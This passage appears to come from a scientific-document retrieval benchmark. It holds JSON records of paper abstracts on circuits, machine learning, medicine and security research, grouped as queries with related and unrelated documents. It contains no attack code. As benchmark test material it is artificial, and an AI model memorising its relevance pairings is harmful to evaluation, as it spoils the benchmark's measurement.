"text": "This paper presents a 1.2V/2.5V tolerant I/O buffer design with only thin gate-oxide devices. The novel floating N-well and gate-tracking circuits in mixed-voltage I/O buffer are proposed to overcome the problem of leakage current, which will occur in the conventional CMOS I/O buffer when using in the mixedvoltage I/O interfaces. The new proposed 1.2V/2.5V tolerant I/O buffer design has been successfully verified in a 0.13-μm salicided CMOS process, which can be also applied in other CMOS processes to serve different mixed-voltage I/O interfaces.",
"title": ""
},
{
"docid": "d5bc3147e23f95a070bce0f37a96c2a8",
"text": "This paper presents a fully integrated wideband current-mode digital polar power amplifier (DPA) in CMOS with built-in AM–PM distortion self-compensation. Feedforward capacitors are implemented in each differential cascode digital power cell. These feedforward capacitors operate together with a proposed DPA biasing scheme to minimize the DPA output device capacitance <inline-formula> <tex-math notation=\"LaTeX\">$C_{d}$ </tex-math></inline-formula> variations over a wide output power range and a wide carrier frequency bandwidth, resulting in DPA AM–PM distortion reduction. A three-coil transformer-based DPA output passive network is implemented within a single transformer footprint (330 <inline-formula> <tex-math notation=\"LaTeX\">$\\mu \\text{m} \\,\\, \\times $ </tex-math></inline-formula> 330 <inline-formula> <tex-math notation=\"LaTeX\">$\\mu \\text{m}$ </tex-math></inline-formula>) and provides parallel power combining and load impedance transformation with a low loss, an octave bandwidth, and a large impedance transformation ratio. Moreover, this proposed power amplifier (PA) output passive network shows a desensitized phase response to <inline-formula> <tex-math notation=\"LaTeX\">$C_{d}$ </tex-math></inline-formula> variations and further suppresses the DPA AM–PM distortion. Both proposed AM–PM distortion self-compensation techniques are effective for a large carrier frequency range and a wide modulation bandwidth, and are independent of the DPA AM control codes. This results in a superior inherent DPA phase linearity and reduces or even eliminates the need for phase pre-distortion, which dramatically simplifies the DPA pre-distortion computations. As a proof-of-concept, a 2–4.3 GHz wideband DPA is implemented in a standard 28-nm bulk CMOS process. Operating with a low supply voltage of 1.4 V for enhanced reliability, the DPA demonstrates ±0.5 dB PA output power bandwidth from 2 to 4.3 GHz with +24.9 dBm peak output power at 3.1 GHz. The measured peak PA drain efficiency is 42.7% at 2.5 GHz and is more than 27% from 2 to 4.3 GHz. The measured PA AM–PM distortion is within 6.8° at 2.8 GHz over the PA output power dynamic range of 25 dB, achieving the lowest AM–PM distortion among recently reported current-mode DPAs in the same frequency range. Without any phase pre-distortion, modulation measurements with a 20-MHz 802.11n standard compliant signal demonstrate 2.95% rms error vector magnitude, −33.5 dBc adjacent channel leakage ratio, 15.6% PA drain efficiency, and +14.6 dBm PA average output power at 2.8 GHz.",
"title": ""
}
] | scidocsrr |
b1079c497e8765bc1dbab6256b95a62f | CERN: Confidence-Energy Recurrent Network for Group Activity Recognition | [
{
"docid": "05a788c8387e58e59e8345f343b4412a",
"text": "We deal with the problem of recognizing social roles played by people in an event. Social roles are governed by human interactions, and form a fundamental component of human event description. We focus on a weakly supervised setting, where we are provided different videos belonging to an event class, without training role labels. Since social roles are described by the interaction between people in an event, we propose a Conditional Random Field to model the inter-role interactions, along with person specific social descriptors. We develop tractable variational inference to simultaneously infer model weights, as well as role assignment to all people in the videos. We also present a novel YouTube social roles dataset with ground truth role annotations, and introduce annotations on a subset of videos from the TRECVID-MED11 [1] event kits for evaluation purposes. The performance of the model is compared against different baseline methods on these datasets.",
"title": ""
},
{
"docid": "5f77e21de8f68cba79fc85e8c0e7725e",
"text": "We introduce structured prediction energy networks (SPENs), a flexible framework for structured prediction. A deep architecture is used to define an energy function of candidate labels, and then predictions are produced by using backpropagation to iteratively optimize the energy with respect to the labels. This deep architecture captures dependencies between labels that would lead to intractable graphical models, and performs structure learning by automatically learning discriminative features of the structured output. One natural application of our technique is multi-label classification, which traditionally has required strict prior assumptions about the interactions between labels to ensure tractable learning and prediction problems. We are able to apply SPENs to multi-label problems with substantially larger label sets than previous applications of structured prediction, while modeling high-order interactions using minimal structural assumptions. Overall, deep learning provides remarkable tools for learning features of the inputs to a prediction problem, and this work extends these techniques to learning features of structured outputs. Our experiments provide impressive performance on a variety of benchmark multi-label classification tasks, demonstrate that our technique can be used to provide interpretable structure learning, and illuminate fundamental trade-offs between feed-forward and iterative structured prediction techniques.",
"title": ""
}
] | [
{
"docid": "acd93c6b041a975dcf52c7bafaf05b16",
"text": "Patients with carcinoma of the tongue including the base of the tongue who underwent total glossectomy in a period of just over ten years since January 1979 have been reviewed. Total glossectomy may be indicated as salvage surgery or as a primary procedure. The larynx may be preserved or may have to be sacrificed depending upon the site of the lesion. When the larynx is preserved the use of laryngeal suspension facilitates early rehabilitation and preserves the quality of life to a large extent. Cricopharyngeal myotomy seems unnecessary.",
"title": ""
},
{
"docid": "62d9add3a14100d57fc9d1c1342029e3",
"text": "A multidimensional access method offering significant performance increases by intelligently partitioning the query space is applied to relational database management systems (RDBMS). We introduce a formal model for multidimensional partitioned relations and discuss several typical query patterns. The model identifies the significance of multidimensional range queries and sort operations. The discussion of current access methods gives rise to the need for a multidimensional partitioning of relations. A detailed analysis of space partitioning focussing especially on Z-ordering illustrates the principle benefits of multidimensional indexes. After describing the UB-Tree and its standard algorithms for insertion, deletion, point queries, and range queries, we introduce the spiral algorithm for nearest neighbor queries with UB-Trees and the Tetris algorithm for efficient access to a table in arbitrary sort order. We then describe the complexity of the involved algorithms and give solutions to selected algorithmic problems for a prototype implementation of UB-Trees on top of several RDBMSs. A cost model for sort operations with and without range restrictions is used both for analyzing our algorithms and for comparing UB-Trees with state-of-the-art query processing. Performance comparisons with traditional access methods practically confirm the theoretically expected superiority of UB-Trees and our algorithms over traditional access methods: Query processing in RDBMS is accelerated by several orders of magnitude, while the resource requirements in main memory space and disk space are substantially reduced. Benchmarks on some queries of the TPC-D benchmark as well as the data warehousing scenario of a fruit juice company illustrate the potential impact of our work on relational algebra, SQL, and commercial applications. The results of this thesis were developed by the author managing the MISTRAL project, a joint research and development project with SAP AG (Germany), Teijin Systems Technology Ltd. (Japan), NEC (Japan), Hitachi (Japan), Gesellschaft für Konsumforschung (Germany), and TransAction Software GmbH (Germany).",
"title": ""
},
{
"docid": "7f5b31d805d4519688bcd9b8581f0f3a",
"text": "Special features such as ridges, valleys and silhouettes, of a polygonal scene are usually displayed by explicitly identifying and then rendering `edges' for the corresponding geometry. The candidate edges are identified using the connectivity information, which requires preprocessing of the data. We present a non-obvious but surprisingly simple to implement technique to render such features without connectivity information or preprocessing. At the hardware level, based only on the vertices of a given flat polygon, we introduce new polygons, with appropriate color, shape and orientation, so that they eventually appear as special features.",
"title": ""
},
{
"docid": "05c82f9599b431baa584dd1e6d7dfc3e",
"text": "It is a common conception that CS1 is a very difficult course and that failure rates are high. However, until now there has only been anecdotal evidence for this claim. This article reports on a survey among institutions around the world regarding failure rates in introductory programming courses. The article describes the design of the survey and the results. The number of institutions answering the call for data was unfortunately rather low, so it is difficult to make firm conclusions. It is our hope that this article can be the starting point for a systematic collection of data in order to find solid proof of the actual failure and pass rates of CS1.",
"title": ""
},
{
"docid": "337b03633afacc96b443880ad996f013",
"text": "Mobile security becomes a hot topic recently, especially in mobile payment and privacy data fields. Traditional solution can't keep a good balance between convenience and security. Against this background, a dual OS security solution named Trusted Execution Environment (TEE) is proposed and implemented by many institutions and companies. However, it raised TEE fragmentation and control problem. Addressing this issue, a mobile security infrastructure named Trusted Execution Environment Integration (TEEI) is presented to integrate multiple different TEEs. By using Trusted Virtual Machine (TVM) tech-nology, TEEI allows multiple TEEs running on one secure world on one mobile device at the same time and isolates them safely. Furthermore, a Virtual Network protocol is proposed to enable communication and cooperation among TEEs which includes TEE on TVM and TEE on SE. At last, a SOA-like Internal Trusted Service (ITS) framework is given to facilitate the development and maintenance of TEEs.",
"title": ""
},
{
"docid": "f3ec87229acd0ec98c044ad42fd9fec1",
"text": "Increasingly, Internet users trade privacy for service. Facebook, Google, and others mine personal information to target advertising. This paper presents a preliminary and partial answer to the general question \"Can users retain their privacy while still benefiting from these web services?\". We propose NOYB, a novel approach that provides privacy while preserving some of the functionality provided by online services. We apply our approach to the Facebook online social networking website. Through a proof-of-concept implementation we demonstrate that NOYB is practical and incrementally deployable, requires no changes to or cooperation from an existing online service, and indeed can be non-trivial for the online service to detect.",
"title": ""
},
{
"docid": "1e59d0a96b5b652a9a1f9bec77aac29e",
"text": "BACKGROUND\n2015 was the target year for malaria goals set by the World Health Assembly and other international institutions to reduce malaria incidence and mortality. A review of progress indicates that malaria programme financing and coverage have been transformed since the beginning of the millennium, and have contributed to substantial reductions in the burden of disease.\n\n\nFINDINGS\nInvestments in malaria programmes increased by more than 2.5 times between 2005 and 2014 from US$ 960 million to US$ 2.5 billion, allowing an expansion in malaria prevention, diagnostic testing and treatment programmes. In 2015 more than half of the population of sub-Saharan Africa slept under insecticide-treated mosquito nets, compared to just 2 % in 2000. Increased availability of rapid diagnostic tests and antimalarial medicines has allowed many more people to access timely and appropriate treatment. Malaria incidence rates have decreased by 37 % globally and mortality rates by 60 % since 2000. It is estimated that 70 % of the reductions in numbers of cases in sub-Saharan Africa can be attributed to malaria interventions.\n\n\nCONCLUSIONS\nReductions in malaria incidence and mortality rates have been made in every WHO region and almost every country. However, decreases in malaria case incidence and mortality rates were slowest in countries that had the largest numbers of malaria cases and deaths in 2000; reductions in incidence need to be greatly accelerated in these countries to achieve future malaria targets. Progress is made challenging because malaria is concentrated in countries and areas with the least resourced health systems and the least ability to pay for system improvements. Malaria interventions are nevertheless highly cost-effective and have not only led to significant reductions in the incidence of the disease but are estimated to have saved about US$ 900 million in malaria case management costs to public providers in sub-Saharan Africa between 2000 and 2014. Investments in malaria programmes can not only reduce malaria morbidity and mortality, thereby contributing to the health targets of the Sustainable Development Goals, but they can also transform the well-being and livelihood of some of the poorest communities across the globe.",
"title": ""
},
{
"docid": "bffd767503e0ab9627fc8637ca3b2efb",
"text": "Automatically searching for optimal hyperparameter configurations is of crucial importance for applying deep learning algorithms in practice. Recently, Bayesian optimization has been proposed for optimizing hyperparameters of various machine learning algorithms. Those methods adopt probabilistic surrogate models like Gaussian processes to approximate and minimize the validation error function of hyperparameter values. However, probabilistic surrogates require accurate estimates of sufficient statistics (e.g., covariance) of the error distribution and thus need many function evaluations with a sizeable number of hyperparameters. This makes them inefficient for optimizing hyperparameters of deep learning algorithms, which are highly expensive to evaluate. In this work, we propose a new deterministic and efficient hyperparameter optimization method that employs radial basis functions as error surrogates. The proposed mixed integer algorithm, called HORD, searches the surrogate for the most promising hyperparameter values through dynamic coordinate search and requires many fewer function evaluations. HORD does well in low dimensions but it is exceptionally better in higher dimensions. Extensive evaluations on MNIST and CIFAR-10 for four deep neural networks demonstrate HORD significantly outperforms the well-established Bayesian optimization methods such as GP, SMAC and TPE. For instance, on average, HORD is more than 6 times faster than GP-EI in obtaining the best configuration of 19 hyperparameters.",
"title": ""
},
{
"docid": "c93c0966ef744722d58bbc9170e9a8ab",
"text": "Past research has generated mixed support among social scientists for the utility of social norms in accounting for human behavior. We argue that norms do have a substantial impact on human action; however, the impact can only be properly recognized when researchers (a) separate 2 types of norms that at times act antagonistically in a situation—injunctive norms (what most others approve or disapprove) and descriptive norms (what most others do)—and (b) focus Ss' attention principally on the type of norm being studied. In 5 natural settings, focusing Ss on either the descriptive norms or the injunctive norms regarding littering caused the Ss* littering decisions to change only in accord with the dictates of the then more salient type of norm.",
"title": ""
},
{
"docid": "75b075bb5f125031d30361f07dbafb65",
"text": "Real world prediction problems often involve the simultaneous prediction of multiple target variables using the same set of predictive variables. When the target variables are binary, the prediction task is called multi-label classification while when the target variables are realvalued the task is called multi-target regression. Although multi-target regression attracted the attention of the research community prior to multi-label classification, the recent advances in this field motivate a study of whether newer state-of-the-art algorithms developed for multilabel classification are applicable and equally successful in the domain of multi-target regression. In this paper we introduce two new multitarget regression algorithms: multi-target stacking (MTS) and ensemble of regressor chains (ERC), inspired by two popular multi-label classification approaches that are based on a single-target decomposition of the multi-target problem and the idea of treating the other prediction targets as additional input variables that augment the input space. Furthermore, we detect an important shortcoming on both methods related to the methodology used to create the additional input variables and develop modified versions of the algorithms (MTSC and ERCC) to tackle it. All methods are empirically evaluated on 12 real-world multi-target regression datasets, 8 of which are first introduced in this paper and are made publicly available for future benchmarks. The experimental results show that ERCC performs significantly better than both a strong baseline that learns a single model for each target using bagging of regression trees and the state-of-the-art multi-objective random forest approach. Also, the proposed modification results in significant performance gains for both MTS and ERC.",
"title": ""
},
{
"docid": "ae3dda04efd601d8be361c6a32ec7bcc",
"text": "Many large-scale machine learning (ML) applications use iterative algorithms to converge on parameter values that make the chosen model fit the input data. Often, this approach results in the same sequence of accesses to parameters repeating each iteration. This paper shows that these repeating patterns can and should be exploited to improve the efficiency of the parallel and distributed ML applications that will be a mainstay in cloud computing environments. Focusing on the increasingly popular \"parameter server\" approach to sharing model parameters among worker threads, we describe and demonstrate how the repeating patterns can be exploited. Examples include replacing dynamic cache and server structures with static pre-serialized structures, informing prefetch and partitioning decisions, and determining which data should be cached at each thread to avoid both contention and slow accesses to memory banks attached to other sockets. Experiments show that such exploitation reduces per-iteration time by 33--98%, for three real ML workloads, and that these improvements are robust to variation in the patterns over time.",
"title": ""
},
{
"docid": "08260ba76f242725b8a08cbd8e4ec507",
"text": "Vocal singing (singing with lyrics) shares features common to music and language but it is not clear to what extent they use the same brain systems, particularly at the higher cortical level, and how this varies with expertise. Twenty-six participants of varying singing ability performed two functional imaging tasks. The first examined covert generative language using orthographic lexical retrieval while the second required covert vocal singing of a well-known song. The neural networks subserving covert vocal singing and language were found to be proximally located, and their extent of cortical overlap varied with singing expertise. Nonexpert singers showed greater engagement of their language network during vocal singing, likely accounting for their less tuneful performance. In contrast, expert singers showed a more unilateral pattern of activation associated with reduced engagement of the right frontal lobe. The findings indicate that singing expertise promotes independence from the language network with decoupling producing more tuneful performance. This means that the age-old singing practice of 'finding your singing voice' may be neurologically mediated by changing how strongly singing is coupled to the language system.",
"title": ""
},
{
"docid": "63fef6099108f7990da0a7687e422e14",
"text": "The IWSLT 2017 evaluation campaign has organised three tasks. The Multilingual task, which is about training machine translation systems handling many-to-many language directions, including so-called zero-shot directions. The Dialogue task, which calls for the integration of context information in machine translation, in order to resolve anaphoric references that typically occur in human-human dialogue turns. And, finally, the Lecture task, which offers the challenge of automatically transcribing and translating real-life university lectures. Following the tradition of these reports, we will described all tasks in detail and present the results of all runs submitted by their participants.",
"title": ""
},
{
"docid": "20d754528009ebce458eaa748312b2fe",
"text": "This poster provides a comparative study between Inverse Reinforcement Learning (IRL) and Apprenticeship Learning (AL). IRL and AL are two frameworks, using Markov Decision Processes (MDP), which are used for the imitation learning problem where an agent tries to learn from demonstrations of an expert. In the AL framework, the agent tries to learn the expert policy whereas in the IRL framework, the agent tries to learn a reward which can explain the behavior of the expert. This reward is then optimized to imitate the expert. One can wonder if it is worth estimating such a reward, or if estimating a policy is sufficient. This quite natural question has not really been addressed in the literature right now. We provide partial answers, both from a theoretical and empirical point of view.",
"title": ""
},
{
"docid": "f3a4f5bd47e978d3c74aa5dbfe93f9f9",
"text": "We study the problem of analyzing tweets with Universal Dependencies (UD; Nivre et al., 2016). We extend the UD guidelines to cover special constructions in tweets that affect tokenization, part-ofspeech tagging, and labeled dependencies. Using the extended guidelines, we create a new tweet treebank for English (TWEEBANK V2) that is four times larger than the (unlabeled) TWEEBANK V1 introduced by Kong et al. (2014). We characterize the disagreements between our annotators and show that it is challenging to deliver consistent annotation due to ambiguity in understanding and explaining tweets. Nonetheless, using the new treebank, we build a pipeline system to parse raw tweets into UD. To overcome annotation noise without sacrificing computational efficiency, we propose a new method to distill an ensemble of 20 transition-based parsers into a single one. Our parser achieves an improvement of 2.2 in LAS over the un-ensembled baseline and outperforms parsers that are state-ofthe-art on other treebanks in both accuracy and speed.",
"title": ""
},
{
"docid": "7d05958787d0f7a510aab1109c97b502",
"text": "The purpose of this review is to gain more insight in the neuropathology of pathological gambling and problem gambling, and to discuss challenges in this research area. Results from the reviewed PG studies show that PG is more than just an impulse control disorder. PG seems to fit very well with recent theoretical models of addiction, which stress the involvement of the ventral tegmental-orbito frontal cortex. Differentiating types of PG on game preferences (slot machines vs. casino games) seems to be useful because different PG groups show divergent results, suggesting different neurobiological pathways to PG. A framework for future studies is suggested, indicating the need for hypothesis driven pharmacological and functional imaging studies in PG and integration of knowledge from different research areas to further elucidate the neurobiological underpinnings of this disorder. Cognitive and neuroimaging findings in pathological gambling",
"title": ""
},
{
"docid": "981da4eddfc1c9fbbceef437f5f43439",
"text": "A significant number of schizophrenic patients show patterns of smooth pursuit eye-tracking patterns that differ strikingly from the generally smooth eye-tracking seen in normals and in nonschizophrenic patients. These deviations are probably referable not only to motivational or attentional factors, but also to oculomotor involvement that may have a critical relevance for perceptual dysfunction in schizophrenia.",
"title": ""
},
{
"docid": "5680f69d9f93c2def5f3a0cb5854b1d4",
"text": "Heart rate (HR) monitoring is necessary for daily healthcare. Wrist-type photoplethsmography (PPG) is a convenient and non-invasive technique for HR monitoring. However, motion artifacts (MA) caused by subjects' movements can extremely interfere the results of HR monitoring. In this paper, we propose a high accuracy method using motion decision, singular spectrum analysis (SSA) and spectral peak searching for daily HR estimation. The proposed approach was evaluated on 8 subjects under a series of different motion states. Compared with electrocardiogram (ECG) recorded simultaneously, the experimental results indicated that the averaged absolute estimation error was 2.33 beats per minute (BPM).",
"title": ""
},
{
"docid": "fcda8929585bc0e27e138070674dc455",
"text": "Also referred to as Gougerot-Carteaud syndrome, confluent and reticulated papillomatosis (CARP) is an acquired keratinization disorder of uncertain etiology. Clinically, it is typically characterized by symptomless, grayish-brown, scaly, flat papules that coalesce into larger patches with a reticular pattern at the edges. Sites most commonly affected include the anterior and/or posterior upper trunk region [1–3]. Although its clinical diagnosis is usually straightforward, the distinction from similar pigmentary dermatoses may sometimes be challenging, especially in case of lesions occurring in atypical locations [1–3]. In recent years, dermatoscopy has been shown to be useful in the clinical diagnosis of several “general” skin disorders, thus reducing the number of cases requiring biopsy [4–8]. The objective of the present study was to describe the dermatoscopic features of CARP in order to facilitate its noninvasive diagnosis. Eight individuals (3 women/5 men; mean age 29.2 years, range 18–51 years; mean disease duration 3 months, range 1–9 months) with CARP (diagnosed on the basis of histological findings and clinical criteria) [1] were included in the study. None of the patients had been using systemic or topical therapies for at least six weeks. In each patient, a handheld noncontact polarized dermatoscope (DermLite DL3 × 10; 3 Gen, San Juan Capistrano, CA, USA) equipped with a camera (Coolpix® 4500 Nikon Corporation, Melville, NY, USA) was used to take a dermatoscopic picture of a single target lesion (flat desquamative papule). All pictures were evaluated for the presence of specific morphological patterns by two of the authors (EE, GS). In all cases (100.0 %), we observed the same findings: fine whitish scaling as well as homogeneous, brownish, more or less defined, flat polygonal globules separated by whitish/ pale striae, thus creating a cobblestone pattern (Figure 1a, b). The shade of the flat globules was dark-brown (Figure 1a) in five (62.5 %) and light-brown (Figure 1b) in three (37.5 %) cases. To the best of our knowledge, there has only been one previous publication on dermatoscopy of CARP. In that particular study, findings included superficial white scales (likely due to parakeratosis and compact hyperkeratosis), brownish pigmentation with poorly defined borders (thought to correspond to hyperpigmentation of the basal layer), and a pattern of “sulci and gyri” (depressions and elevations, presumably as a result of papillomatosis) [9]. In the present study, we were able to confirm some of the aforementioned findings (white scaling and brownish pigmentation), however, the brownish areas in our patients consistently showed a cobblestone pattern (closely aggregated, squarish/polygonal, flat globules). This peculiar aspect could be due to the combination of basal hyperpigmentation, acanthosis, and papillomatosis, with relative sparing of the normal network of furrows of the skin surface. Accordingly, one might speculate that the different pattern of pigmentation found in the previous study might have resulted from the disruption of these physiological grooves due to more pronounced/irregular acanthosis/ papillomatosis. Remarkably, the detection of fine whitish scaling and brownish areas in a cobblestone or “sulci and gyri” pattern might be useful in distinguishing CARP from its differential diagnoses [10] (Table 1). These primarily include 1) tinea (pityriasis) versicolor, which is characterized by a pigmented network composed of brownish stripes and fine scales [11],",
"title": ""
},
{
"docid": "c9ff6e6c47b6362aaba5f827dd1b48f2",
"text": "IEC 62056 for upper-layer protocols and IEEE 802.15.4g for communication infrastructure are promising means of advanced metering infrastructure (AMI) in Japan. However, since the characteristics of a communication system based on these combined technologies have yet to be identified, this paper gives the communication failure rates and latency acquired by calculations. In addition, the calculation results suggest some adequate AMI configurations, and show its extensibility in consideration of the usage environment.",
"title": ""
}
] | scidocsrr |
bf573ca20f03af584b2bda71f75f2d05 | Training an Interactive Humanoid Robot Using Multimodal Deep Reinforcement Learning | [
{
"docid": "5273e9fea51c85651255de7c253066a0",
"text": "This paper presents SimpleDS, a simple and publicly available dialogue system trained with deep reinforcement learning. In contrast to previous reinforcement learning dialogue systems, this system avoids manual feature engineering by performing action selection directly from raw text of the last system and (noisy) user responses. Our initial results, in the restaurant domain, report that it is indeed possible to induce reasonable behaviours with such an approach that aims for higher levels of automation in dialogue control for intelligent interactive agents.",
"title": ""
}
] | [
{
"docid": "db78f4fa7e3a795b14f423a7dfa99828",
"text": "Music shares a very special relation with human emotions. We often choose to listen to a song or music which best fits our mood at that instant. In spite of this strong correlation, most of the music applications today are devoid of providing the facility of mood-aware playlist generation. We wish to contribute to automatic identification of mood in audio songs by utilizing their spectral and temporal audio features. Our current work involves analysis of various features in order to learn, train and test the model representing the moods of the audio songs. Focus of our work is on the Indian popular music pieces and our work continues to analyse, develop and improve the algorithms to produce a system to recognize the mood category of the audio files automatically.",
"title": ""
},
{
"docid": "9a4fc12448d166f3a292bfdf6977745d",
"text": "Enabled by the rapid development of virtual reality hardware and software, 360-degree video content has proliferated. From the network perspective, 360-degree video transmission imposes significant challenges because it consumes 4 6χ the bandwidth of a regular video with the same resolution. To address these challenges, in this paper, we propose a motion-prediction-based transmission mechanism that matches network video transmission to viewer needs. Ideally, if viewer motion is perfectly known in advance, we could reduce bandwidth consumption by 80%. Practically, however, to guarantee the quality of viewing experience, we have to address the random nature of viewer motion. Based on our experimental study of viewer motion (comprising 16 video clips and over 150 subjects), we found the viewer motion can be well predicted in 100∼500ms. We propose a machine learning mechanism that predicts not only viewer motion but also prediction deviation itself. The latter is important because it provides valuable input on the amount of redundancy to be transmitted. Based on such predictions, we propose a targeted transmission mechanism that minimizes overall bandwidth consumption while providing probabilistic performance guarantees. Real-data-based evaluations show that the proposed scheme significantly reduces bandwidth consumption while minimizing performance degradation, typically a 45% bandwidth reduction with less than 0.1% failure ratio.",
"title": ""
},
{
"docid": "bf71f7f57def7633a5390b572e983bc9",
"text": "With the development of the Internet, cyber-attacks are changing rapidly and the cyber security situation is not optimistic. This survey report describes key literature surveys on machine learning (ML) and deep learning (DL) methods for network analysis of intrusion detection and provides a brief tutorial description of each ML/DL method. Papers representing each method were indexed, read, and summarized based on their temporal or thermal correlations. Because data are so important in ML/DL methods, we describe some of the commonly used network datasets used in ML/DL, discuss the challenges of using ML/DL for cybersecurity and provide suggestions for research directions.",
"title": ""
},
{
"docid": "02dab9e102d1b8f5e4f6ab66e04b3aad",
"text": "CHILD CARE PRACTICES ANTECEDING THREE PATTERNS OF PRESCHOOL BEHAVIOR. STUDIED SYSTEMATICALLY CHILD-REARING PRACTICES ASSOCIATED WITH COMPETENCE IN THE PRESCHOOL CHILD. 2015 American Psychological Association PDF documents require Adobe Acrobat Reader.Effects of Authoritative Parental Control on Child Behavior, Child. Child care practices anteceding three patterns of preschool behavior. Genetic.She is best known for her work on describing parental styles of child care and. Anteceding Three Patterns of Preschool Behavior, Genetic Psychology.Child care practices anteceding three patterns of preschool behavior.",
"title": ""
},
{
"docid": "55f95c7b59f17fb210ebae97dbd96d72",
"text": "Clustering is a widely studied data mining problem in the text domains. The problem finds numerous applications in customer segmentation, classification, collaborative filtering, visualization, document organization, and indexing. In this chapter, we will provide a detailed survey of the problem of text clustering. We will study the key challenges of the clustering problem, as it applies to the text domain. We will discuss the key methods used for text clustering, and their relative advantages. We will also discuss a number of recent advances in the area in the context of social network and linked data.",
"title": ""
},
{
"docid": "0ff76204fcdf1a7cf2a6d13a5d3b1597",
"text": "In this study, we found that the optimum take-off angle for a long jumper may be predicted by combining the equation for the range of a projectile in free flight with the measured relations between take-off speed, take-off height and take-off angle for the athlete. The prediction method was evaluated using video measurements of three experienced male long jumpers who performed maximum-effort jumps over a wide range of take-off angles. To produce low take-off angles the athletes used a long and fast run-up, whereas higher take-off angles were produced using a progressively shorter and slower run-up. For all three athletes, the take-off speed decreased and the take-off height increased as the athlete jumped with a higher take-off angle. The calculated optimum take-off angles were in good agreement with the athletes' competition take-off angles.",
"title": ""
},
{
"docid": "f5e2f0c8b3f7e7537751e5e411e665ce",
"text": "Network Function Virtualization (NFV) applications are stateful. For example, a Content Distribution Network (CDN) caches web contents from remote servers and serves them to clients. Similarly, an Intrusion Detection System (IDS) and an Intrusion Prevention System (IPS) have both per-flow and multi-flow (shared) states to properly react to intrusions. On today's NFV infrastructures, security vulnerabilities many allow attackers to steal and manipulate the internal states of NFV applications that share a physical resource. In this paper, we propose a new protection scheme, S-NFV that incorporates Intel Software Guard Extensions (Intel SGX) to securely isolate the states of NFV applications.",
"title": ""
},
{
"docid": "4e7f7b1444b253a63d4012b2502f5fa4",
"text": "State-of-the-art techniques for 6D object pose recovery depend on occlusion-free point clouds to accurately register objects in 3D space. To deal with this shortcoming, we introduce a novel architecture called Iterative Hough Forest with Histogram of Control Points that is capable of estimating the 6D pose of an occluded and cluttered object, given a candidate 2D bounding box. Our Iterative Hough Forest (IHF) is learnt using parts extracted only from the positive samples. These parts are represented with Histogram of Control Points (HoCP), a “scale-variant” implicit volumetric description, which we derive from recently introduced Implicit B-Splines (IBS). The rich discriminative information provided by the scale-variant HoCP features is leveraged during inference. An automatic variable size part extraction framework iteratively refines the object’s roughly aligned initial pose due to the extraction of coarsest parts, the ones occupying the largest area in image pixels. The iterative refinement is accomplished based on finer (smaller) parts, which are represented with more discriminative control point descriptors by using our Iterative Hough Forest. Experiments conducted on a publicly available dataset report that our approach shows better registration performance than the state-of-the-art methods. © 2017 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "804113bb0459eb04d9b163c086050207",
"text": "The techniques of machine vision are extensively applied to agricultural science, and it has great perspective especially in the plant protection field, which ultimately leads to crops management. The paper describes a software prototype system for rice disease detection based on the infected images of various rice plants. Images of the infected rice plants are captured by digital camera and processed using image growing, image segmentation techniques to detect infected parts of the plants. Then the infected part of the leaf has been used for the classification purpose using neural network. The methods evolved in this system are both image processing and soft computing technique applied on number of diseased rice plants.",
"title": ""
},
{
"docid": "c32cecbc4adc812de6e43b3b0b05866b",
"text": "Reinforcement learning for embodied agents is a challenging problem. The accumulated reward to be optimized is often a very rugged function, and gradient methods are impaired by many local optimizers. We demonstrate, in an experimental setting, that incorporating an intrinsic reward can smoothen the optimization landscape while preserving the global optimizers of interest. We show that policy gradient optimization for locomotion in a complex morphology is significantly improved when supplementing the extrinsic reward by an intrinsic reward defined in terms of the mutual information of time consecutive sensor readings.",
"title": ""
},
{
"docid": "e7f9822daaf18371e53beb75d6e1fb30",
"text": "In this paper1, we propose to disentangle and interpret contextual effects that are encoded in a pre-trained deep neural network. We use our method to explain the gaming strategy of the alphaGo Zero model. Unlike previous studies that visualized image appearances corresponding to the network output or a neural activation only from a global perspective, our research aims to clarify how a certain input unit (dimension) collaborates with other units (dimensions) to constitute inference patterns of the neural network and thus contribute to the network output. The analysis of local contextual effects w.r.t. certain input units is of special values in real applications. Explaining the logic of the alphaGo Zero model is a typical application. In experiments, our method successfully disentangled the rationale of each move during the Go game.",
"title": ""
},
{
"docid": "067fd264747d466b86710366c14a4495",
"text": "We present Embodied Construction Grammar, a formalism for linguist ic analysis designed specifically for integration into a simulation-based model of language unders tanding. As in other construction grammars, linguistic constructions serve to map between phonological f orms and conceptual representations. In the model we describe, however, conceptual representations are als o constrained to be grounded in the body’s perceptual and motor systems, and more precisely to parameteri ze m ntal simulations using those systems. Understanding an utterance thus involves at least two dis inct processes: analysis to determine which constructions the utterance instantiates, and simulationaccording to the parameters specified by those constructions. In this chapter, we outline a constru ction formalism that is both representationally adequate for these purposes and specified precisely enough for se in a computational architecture.",
"title": ""
},
{
"docid": "049f0308869c53bbb60337874789d569",
"text": "In machine learning, one of the main requirements is to build computational models with a high ability to generalize well the extracted knowledge. When training e.g. artificial neural networks, poor generalization is often characterized by over-training. A common method to avoid over-training is the hold-out crossvalidation. The basic problem of this method represents, however, appropriate data splitting. In most of the applications, simple random sampling is used. Nevertheless, there are several sophisticated statistical sampling methods suitable for various types of datasets. This paper provides a survey of existing sampling methods applicable to the data splitting problem. Supporting experiments evaluating the benefits of the selected data splitting techniques involve artificial neural networks of the back-propagation type.",
"title": ""
},
{
"docid": "8a6955ee53b9920a7c192143557ddf44",
"text": "C utaneous metastases rarely develop in patients having cancer with solid tumors. The reported incidence of cutaneous metastases from a known primary malignancy ranges from 0.6% to 9%, usually appearing 2 to 3 years after the initial diagnosis.1-11 Skin metastases may represent the first sign of extranodal disease in 7.6% of patients with a primary oncologic diagnosis.1 Cutaneous metastases may also be the first sign of recurrent disease after treatment, with 75% of patients also having visceral metastases.2 Infrequently, cutaneous metastases may be seen as the primary manifestation of an undiagnosed malignancy.12 Prompt recognition of such tumors can be of great significance, affecting prognosis and management. The initial presentation of cutaneous metastases is frequently subtle and may be overlooked without proper index of suspicion, appearing as multiple or single nodules, plaques, and ulcers, in decreasing order of frequency. Commonly, a painless, mobile, erythematous papule is initially noted, which may enlarge to an inflammatory nodule over time.8 Such lesions may be misdiagnosed as cysts, lipomas, fibromas, or appendageal tumors. Clinical features of cutaneous metastases rarely provide information regarding the primary tumor, although the location of the tumor may be helpful because cutaneous metastases typically manifest in the same geographic region as the initial cancer. The most common primary tumors seen with cutaneous metastases are melanoma, breast, and squamous cell carcinoma of the head and neck.1 Cutaneous metastases are often firm, because of dermal or lymphatic involvement, or erythematous. These features may help rule out some nonvascular entities in the differential diagnosis (eg, 